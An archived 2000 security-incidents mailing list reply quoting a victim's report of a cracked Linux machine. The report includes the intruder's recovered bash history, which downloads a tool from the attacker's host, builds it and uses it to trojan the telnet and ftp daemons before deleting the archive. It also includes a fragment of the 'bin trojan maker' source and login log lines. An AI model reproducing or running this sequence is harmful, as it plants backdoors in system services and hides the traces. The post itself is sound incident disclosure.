Security Incidents mailing list archives
Re: succesful crack
From: icon94 () HOTMAIL COM (icon xxeti)
Date: Thu, 17 Feb 2000 22:09:03 GMT
Welcome to the club. Some sort of trend going on here
From: Bob Lockie <bjlockie () NORTELNETWORKS COM> Reply-To: Bob Lockie <bjlockie () nortelnetworks com> To: INCIDENTS () SECURITYFOCUS COM Subject: succesful crack Date: Tue, 15 Feb 2000 14:59:24 -0500 rjlockie () home net (613) 765-5409 My box (24.112.89.219) was cracked. The attack originated from 24.11.98.152 (c505000-a.blfld1.ct.home.com). It could be this machine was also cracked and it was used as a launching point. Please contact the owner and have a talk with them. The owner should definitely not offer anonymous ftp service. A few things were left on my system. drwxr-xr-x 2 root root 1024 Feb 13 22:03 ADMROCKS I have no /etc/host.allow or /etc/hosts.deny files anymore. This was in /tmp/,bash_history. ftp 24.11.98.152 tar -xvf btm.tar make ./btm /usr/sbin/in.telnetd ./btm /usr/sbin/in.ftpd rm -rf btm.tar The following source: /* bin trojan maker */ #include "btm.h" #define BTM_VER "btm v1.5" int options=0; void usage(char* progname) { printf("usage: %s [-d] [-D define line] [-c] [-l max] [-v] [-u compiler]" " [-o compiler options] target [trojan source]\n",progname); printf("in trojan source, the trojan function must be:\n"); printf(" "TROJAN_FCT"(char** argv,char** envp)\n"); printf("\n"); printf("-d: debug mode\n"); printf("-c: don't trojan, just put the C file on stdout\n"); printf("-l max: max number of char in a line of the C file\n"); printf("-v: display version\n"); printf("-u compiler: use this compiler\n"); printf("-o options: options for compiler\n"); printf("-n: no save for target file\n"); printf("-e: echo commands\n"); printf("-m comments: put comments in btmized file\n"); printf("\n"); exit(0); } int getdirname(char* dirname,char* filename,size_t dirname_size) { if (!filename) return -1; if (filename[0]=='/') { strncpy(dirname,filename,dirname_size); *(((char*)strrchr(dirname,'/'))+1)=0; } else { if (!getcwd(dirname,dirname_size)) { perror("getcwd"); return -1; } } return 0; } /var/log/secure Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by (uid=0 ) Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by tek(uid=5 000) Bob Lockie bjlockie () nortelnetworks com Live long and prosper.
______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
Current thread:
- Re: succesful crack icon xxeti (Feb 17)